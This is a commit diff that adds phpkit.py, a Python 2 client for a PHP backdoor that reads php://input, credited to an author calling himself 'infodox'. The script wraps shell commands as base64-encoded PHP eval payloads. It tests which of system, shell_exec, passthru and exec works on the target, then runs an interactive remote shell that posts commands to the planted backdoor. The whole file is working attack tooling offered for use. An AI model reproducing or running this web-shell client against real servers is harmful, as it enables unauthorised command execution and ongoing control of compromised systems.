update

php shell and jsp shell

php/phpkit-0.2a/phpkit.py

@@ -0,0 +1,106 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+    print "Usage: " + sys.argv[0] + " <url of backdoor>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+    sys.exit(0)
+    
+url = sys.argv[1]
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+###                      ###
+# Whole Bunch of Functions #
+###                      ###
+def genphp(func, cmd):
+    if func == "system":
+        rawphp = """system('%s');""" %(cmd)
+    elif func == "shellexec":
+        rawphp = """echo shell_exec('%s');""" %(cmd)
+    elif func == "passthru":
+        rawphp = """passthru('%s');""" %(cmd)
+    elif func == "exec":
+        rawphp = """echo exec('%s');""" %(cmd)
+    encodedphp = rawphp.encode('base64')
+    payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
+    return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+    print "[+] Testing system()" # I need to make it tighter
+    payload = genphp('system', tester) # No, really. Look at the waste
+    r = requests.post(url, payload) # It could be TIIINY and fast!
+    if testkey in r.text:
+        print "[+] system() works, using system."
+        func = 'system'
+        return func
+    else:
+        print "[-] system() seems disabled :("
+        pass
+    print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+    payload = genphp('shellexec', tester) # THIS COULD BE TINY
+    r = requests.post(url, payload)  # But. Coffee is lacking
+    if testkey in r.text:
+        print "[+] shell_exec() works, using shell_exec"
+        func = 'shellexec'
+        return func
+    else:
+        print "[-] shell_exec() seems disabled :("
+        pass
+    print "[+] Testing passthru()"
+    payload = genphp('passthru', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] passthru() works, using passthru"
+        func = 'passthru'
+        return func
+    else:
+        print "[-] passthru() seems disabled :("
+        pass
+    print "[+] Testing exec()"
+    payload = genphp('exec', tester)
+    r = requests.post(url, payload)
+    if testkey in r.text:
+        print "[+] exec() works, using exec"
+        func = 'exec'
+        return func
+    else:
+        print "[-] exec() seems disabled :("
+        pass
+
+###                                        ###
+# End of functions and object oriented stuff #
+###                                        ###
+
+# the main body
+func = test(url, tester, testkey)
+while True:
+    try:
+        cmd = raw_input("shell:~$ ")
+        if cmd == "quit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        elif cmd == "exit":
+            print "\n[-] Quitting"
+            sys.exit(0)
+        else:
+            try:
+                payload = genphp(func, cmd)
+                hax = requests.post(url, payload)
+                print hax.text
+            except Exception or KeyboardInterrupt:
+                print "[-] Exception Caught, I hope"
+                sys.exit(0)
+    except Exception or KeyboardInterrupt:
+        print "[-] Exception or CTRL+C Caught, I hope"
+        print "[-] Exiting (hopefully) cleanly..."
+        sys.exit(0)